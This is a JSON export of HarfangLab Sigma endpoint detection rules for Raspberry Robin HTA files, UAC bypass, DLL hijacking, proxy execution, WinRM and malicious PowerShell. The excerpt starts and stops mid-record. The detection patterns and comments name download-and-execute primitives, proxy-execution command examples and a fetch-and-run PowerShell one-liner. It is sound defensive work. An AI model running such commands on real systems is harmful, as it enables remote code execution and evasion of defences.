"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "475e5a2d-b012-4d80-80e8-e5b25fd1d8f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091389Z",
"creation_date": "2026-03-23T11:45:34.091391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091395Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://gurucul.com/latest-threats/raspberry-robin-infection-chain-uses-webdav-server/",
"https://x.com/Unit42_Intel/status/1857150852114649216"
],
"name": "t1218_raspberry_robin_hta.yml",
"content": "title: Raspberry Robin Initial Access HTA\nid: 475e5a2d-b012-4d80-80e8-e5b25fd1d8f4\ndescription: |\n Detects when a hta file starting with bytes specific to Raspberry Robin worm is written on the disk\nreferences:\n - https://gurucul.com/latest-threats/raspberry-robin-infection-chain-uses-webdav-server/\n - https://x.com/Unit42_Intel/status/1857150852114649216\ndate: 2025/05/27\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.execution\n - attack.defense_evasion\n - attack.t1218\n - attack.t1218.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Path|endswith: '.hta'\n FirstBytes|startswith: '0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a'\n exclusion:\n Path|startswith: '?:\\Program Files (x86)\\Trend Micro\\'\n condition: selection and not 1 of exclusion*\nlevel: high\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "475e5a2d-b012-4d80-80e8-e5b25fd1d8f4",
"rule_name": "Raspberry Robin Initial Access HTA",
"rule_description": "Detects an HTA file starting with a byte sequence specific to the Raspberry Robin worm (eight consecutive CRLF pairs) being written to disk.\n",
"rule_creation_date": "2025-05-27",
"rule_modified_date": "2025-06-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47690f63-b849-4fc7-acbe-86446b0f9903",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075129Z",
"creation_date": "2026-03-23T11:45:34.075131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075135Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_susp_virtualbox_headless_windows.yml",
"content": "title: VirtualBox Virtual Machine Started via VBoxHeadless\nid: 47690f63-b849-4fc7-acbe-86446b0f9903\ndescription: |\n Detects the usage of VboxHeadless.exe to start a VM.\n Adversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\n It is recommended to investigate process that spawned VBoxHeadless.exe, and check the legitimacy of the started virtual machine.\nreferences:\n - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2024/08/28\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Virtualization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\VBoxHeadless.exe'\n\n filter_vbox:\n - ParentImage: '?:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe'\n - GrandparentImage: '?:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe'\n - ParentImage: '?:\\Program Files\\Oracle\\VirtualBox\\vboxsvc.exe'\n - GrandparentImage: '?:\\Program Files\\Oracle\\VirtualBox\\vboxsvc.exe'\n\n exclusion_ldplayer:\n ProcessParentImage: '.:\\Program Files\\ldplayerbox\\LdVBoxSVC.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47690f63-b849-4fc7-acbe-86446b0f9903",
"rule_name": "VirtualBox Virtual Machine Started via VBoxHeadless",
"rule_description": "Detects the usage of VBoxHeadless.exe to start a virtual machine.\nAdversaries may deploy virtual machines to conduct malicious behavior and evade defenses.\nIt is recommended to investigate the process that spawned VBoxHeadless.exe and to check the legitimacy of the started virtual machine.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4774d33e-c1c4-480b-85b4-d6487b4d5975",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090600Z",
"creation_date": "2026-03-23T11:45:34.090602Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090606Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_provtool.yml",
"content": "title: DLL Hijacking via provtool.exe\nid: 4774d33e-c1c4-480b-85b4-d6487b4d5975\ndescription: |\n Detects potential Windows DLL Hijacking via provtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'provtool'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmcommandlineutils.dll'\n - '\\msvcp110_win.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4774d33e-c1c4-480b-85b4-d6487b4d5975",
"rule_name": "DLL Hijacking via provtool.exe",
"rule_description": "Detects potential Windows DLL hijacking via provtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "478992a5-594c-4509-a88d-bc1d4286c9f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073685Z",
"creation_date": "2026-03-23T11:45:34.073688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073693Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_taskhost.yml",
"content": "title: UAC Bypass Executed via taskhost\nid: 478992a5-594c-4509-a88d-bc1d4286c9f3\ndescription: |\n Detects the execution of the taskhost.exe UAC bypass, involving the hijacking of the cryptbase.dll DLL.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL as well as to analyze the DLL itself to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\taskhost.exe'\n ImageLoaded|endswith: '\\cryptbase.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "478992a5-594c-4509-a88d-bc1d4286c9f3",
"rule_name": "UAC Bypass Executed via taskhost",
"rule_description": "Detects the execution of the taskhost.exe UAC bypass, involving the hijacking of the cryptbase.dll DLL (a cryptbase.dll loaded by taskhost.exe that is not signed by Microsoft Windows).\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL as well as to analyze the DLL itself to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47a08acb-8efd-42f4-a3cc-d3d5e2ef6352",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079270Z",
"creation_date": "2026-03-23T11:45:34.079272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079276Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20221130181950/https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_wseclientsvc.yml",
"content": "title: Suspicious WseClientSvc.exe Execution\nid: 47a08acb-8efd-42f4-a3cc-d3d5e2ef6352\ndescription: |\n Detects a suspicious execution of WseClientSvc.exe, possibly to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to proxy execution of other binaries.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of WseClientSvc.exe and to look for any subsequent malicious actions performed by child processes.\nreferences:\n - https://web.archive.org/web/20221130181950/https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.WseClientSvc\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'WseClientSvc.exe'\n - Image|endswith: '\\WseClientSvc.exe'\n\n selection_cmd:\n # WseClientSvc.exe pass_TestBin.exe calc.exe\n # WseClientSvc.exe lovelymalware calc.weirdext\n CommandLine|re: 'WseClientSvc\\.exe\\ .*\\ .*'\n\n exclusion_windows_server_essentials:\n CommandLine: '?:\\Program Files\\Windows Server\\Bin\\WseClientSvc.exe ?:\\Program Files\\Windows Server\\Bin\\SharedServiceHost.exe ?:\\Program Files\\Windows Server\\Bin\\HealthServiceConfig'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47a08acb-8efd-42f4-a3cc-d3d5e2ef6352",
"rule_name": "Suspicious WseClientSvc.exe Execution",
"rule_description": "Detects a suspicious execution of WseClientSvc.exe, possibly to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to proxy execution of other binaries.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of WseClientSvc.exe and to look for any subsequent malicious actions performed by child processes.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47ac6436-48f7-40f6-b73d-bb00d709a054",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618334Z",
"creation_date": "2026-03-23T11:45:34.618336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setgid_macos.yml",
"content": "title: SetGID Access Flag Set\nid: 47ac6436-48f7-40f6-b73d-bb00d709a054\ndescription: |\n Detects the SetGID bit being set on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user group context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2024/09/17\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.001\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Kind:\n - chmod\n - chmod2\n PrettyMode: '?????S???'\n ProcessImage|contains: '?'\n\n exclusion_install:\n Image: '/private/tmp/PKInstallSandbox.??????/Scripts/*'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47ac6436-48f7-40f6-b73d-bb00d709a054",
"rule_name": "SetGID Access Flag Set",
"rule_description": "Detects the SetGID bit being set on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user group context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2024-09-17",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47e04561-373f-46ad-9771-6e2f2074a8e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083300Z",
"creation_date": "2026-03-23T11:45:34.083302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083306Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_start_winrm_service.yml",
"content": "title: WinRM Service Started\nid: 47e04561-373f-46ad-9771-6e2f2074a8e5\ndescription: |\n Detects the manual launch of the Windows Remote Management (WinRM) service via the net1.exe binary.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to investigate any authentications following this alert to determine if this action is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains|all:\n - ' start '\n - ' winrm'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47e04561-373f-46ad-9771-6e2f2074a8e5",
"rule_name": "WinRM Service Started",
"rule_description": "Detects the manual launch of the Windows Remote Management (WinRM) service via the net1.exe binary.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organisation.\nIt is recommended to investigate any authentications following this alert to determine if this action is legitimate.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "481011ca-b57e-4e3c-9c28-45b01b5589dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091327Z",
"creation_date": "2026-03-23T11:45:34.091329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091334Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://twitter.com/Alh4zr3d/status/1566489367232651264",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_exec_potential_malicious_script.yml",
"content": "title: Possible Execution of a Malicious PowerShell Script\nid: 481011ca-b57e-4e3c-9c28-45b01b5589dd\ndescription: |\n Detects suspicious patterns in PowerShell scripts that can indicate the execution of malicicious code.\n There is functionality in PowerShell scripts that are commonly abused by attackers, such as downloading data (payloads) and executing subsequent PowerShell code from an obfuscated first stage.\n It is recommended to read the PowerShell script as to determine its intent. If the PowerShell script is benign, it is highly recommended to whitelist the script as to avoid false positives.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://twitter.com/Alh4zr3d/status/1566489367232651264\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/25\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n exec:\n PowershellCommand|contains:\n - 'Invoke-Expression'\n - ' iex '\n - ' iex('\n - ' iex ('\n - ' iex;'\n - ' iex\"'\n - ' iex'''\n - '(iex '\n - '(iex('\n - '(iex ('\n - '(iex;'\n - '(iex\"'\n - '(iex'''\n - ';iex '\n - ';iex('\n - ';iex ('\n - ';iex;'\n - ';iex\"'\n - ';iex'''\n - '\"iex '\n - '\"iex('\n - '\"iex ('\n - '\"iex;'\n - '\"iex\"'\n - '\"iex'''\n - '''iex '\n - '''iex('\n - '''iex ('\n - '''iex;'\n - '''iex\"'\n - '''iex'''\n - '|iex'\n\n download:\n PowershellCommand|contains:\n - 'DownloadFile'\n - 'DownloadData'\n - 'DownloadString'\n - 'DeflateStream'\n - 'FromBase64String'\n - 'Invoke-WebRequest'\n\n # Invoke-WebRequest has an alias: iwr\n - ' iwr '\n - ' iwr('\n - ' iwr;'\n - ' iwr\"'\n - ' iwr'''\n - '(iwr '\n - 
'(iwr('\n - '(iwr;'\n - '(iwr\"'\n - '(iwr'''\n - ';iwr '\n - ';iwr('\n - ';iwr;'\n - ';iwr\"'\n - ';iwr'''\n - '\"iwr '\n - '\"iwr('\n - '\"iwr;'\n - '\"iwr\"'\n - '\"iwr'''\n - '''iwr '\n - '''iwr('\n - '''iwr;'\n - '''iwr\"'\n - '''iwr'''\n\n nslookup:\n PowershellCommand|contains|all:\n - 'nslookup'\n - '=txt'\n - '[-1]'\n\n exclusion_microsoft_signed:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Microsoft Corporation'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n\n assembly_load:\n PowershellCommand|contains: 'CurrentDomain.Load'\n\n # matches on something being compressed (gzip / deflate) and base64 encoded\n # and decompressed dynamically\n decompress_payload:\n PowershellCommand|contains:\n - 'DeflateStream'\n - 'GzipStream'\n\n PowershellCommand|contains|all:\n - '::FromBase64String'\n - '::Decompress'\n\n exclusion_chocolatey:\n PowershellCommand|contains: 'https://chocolatey.org/install.ps1'\n ProcessParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_chocolatey_community:\n # Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command [System.Net.ServicePointManager]::SecurityProtocol = 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\n # powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object 